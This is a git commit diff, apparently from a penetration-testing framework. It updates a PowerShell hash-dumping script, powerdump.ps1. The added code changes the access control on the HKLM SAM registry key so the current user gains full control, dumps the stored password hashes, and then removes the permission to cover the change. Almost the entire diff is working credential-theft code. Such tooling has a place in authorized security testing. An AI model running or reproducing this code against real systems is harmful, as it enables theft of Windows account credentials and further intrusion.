Add token fiddling from nishang

Meatballs1 · Meatballs1 · commit f5f32fac061e · 2014-11-28T23:02:59.000Z
diff --git a/data/exploits/powershell/powerdump.ps1 b/data/exploits/powershell/powerdump.ps1
@@ -1,3 +1,6 @@
+# PowerDump by David Kennedy Copyright 2014 The Social-Engineer Toolkit
+# https://github.com/trustedsec/social-engineer-toolkit
+# User Token Code by Nikhil Mitt ttps://github.com/samratashok/nishang
 function LoadApi
 {
     $oldErrorAction = $global:ErrorActionPreference;
@@ -354,4 +357,26 @@ function DumpHashes
             [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
     }
 }
+
+#Set permissions for the current user.
+$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
+"FullControl",
+[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
+[System.Security.AccessControl.PropagationFlags]"None",
+[System.Security.AccessControl.AccessControlType]"Allow")
+$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
+"SAM\SAM\Domains",
+[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
+[System.Security.AccessControl.RegistryRights]::ChangePermissions)
+$acl = $key.GetAccessControl()
+$acl.SetAccessRule($rule)
+$key.SetAccessControl($acl)
+
 DumpHashes
+
+#Remove the permissions added above.
+$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
+$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
+Set-Acl HKLM:\SAM\SAM\Domains $acl
+
